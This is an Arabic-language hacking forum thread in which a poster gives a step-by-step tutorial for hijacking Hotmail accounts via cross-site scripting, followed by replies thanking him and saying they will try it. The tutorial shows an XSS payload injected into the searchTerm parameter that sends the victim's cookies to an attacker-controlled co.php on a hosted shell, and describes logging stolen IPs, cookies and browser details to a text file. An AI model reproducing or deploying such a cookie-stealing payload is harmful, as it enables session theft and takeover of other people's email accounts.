![]() |
شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS 1 مرفق بسم الله الرحمن الرحيم.. http://www.almlf.com/get-7-2011-almlf_com_pukuk0m2.png طيب تمام اول شي نحمل ملف co.php http://pastebin.com/mZCMRcGC طيب نرفعه على الشل تممام الحين نشوف الاستغلال.. كود PHP: /patch patch=اسم المجلد الحين كل ماعلينا هوا تشفير الكود راح نشفر من بعد كلمة searchTerm= من بعد اليساوي.. نشوف يعني مثلآ كذا "><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script> طيب راح نشفر بمقاياس http full عن طريق برنامج coder نفتحه ونحط الكود ونشوف.. http://www.almlf.com/get-7-2011-almlf_com_jrdfjuav.png تم تشفير الكود الحين نبلدله بدل الكود الاول.. يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر .. الحين نعمل صفحه بلغه HtM نشوف.. من الشل.. http://www.almlf.com/get-7-2011-almlf_com_jiy46r37.png الحين نضع داخل الملف.. http://www.almlf.com/get-7-2011-almlf_com_ktmkquyw.png الكود كود: <htm> والكود الثانيه.. نضع بعد src كود الاستغلال الي عملنها قبل يصبح مثل كذا,, كود PHP: الحين ندخل على صفحه thmooryالي عملته.. تابعو.. http://www.almlf.com/get-7-2011-almlf_com_7b9f78vq.png تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف .. نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو ok.txt http://www.almlf.com/get-7-2011-almlf_com_yrmtfcww.png انتهى الشرح اتمنى انو عجبكم الاكواد مرفقه شان الموقع يحجبهم.. |
نجرب ، يابطــل ، ونشوف ، ونرد لـك ، خبـر ^_^ |
ممم ما شاء الله بعد التجريب لي رجعة و مشكوور مسبقا |
تم ترقيع ، هذه الثغره ، ولا ينفع ، والموضوع موجود بقوقل ، يعيطيك الف ، عافيه ع الشرح ، ياكنق |
نعم اتغرة مرة عليها ايام ولا بد من ان هوتميل لم تغفل عنها مشكوووور عل بدل جهد بتوفيق |
مشكور ياغالي على الشرح الرائع بارك الله فيك |
تسلم يا غالي رح اجربها .. |
نجرب و نشوف شكرا لك اخيي |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS قديمه ولكن لك الشكر |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS a@mohmal.coma@mohmal.coma@mohmal.com |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS مـــشكوور اخوي انا بصراحه من زمان ودي اعرف الثغره هذي تحياتي لك اخوي تقبل مروري |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS شكرا لك لكن اشكل الكلمات مشفره |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS i need it :D |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS tnxxxx |
رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS thanxxxxxxxxxxxxxx |
الساعة الآن 12:28 AM |
[ vBspiders.Com Network ]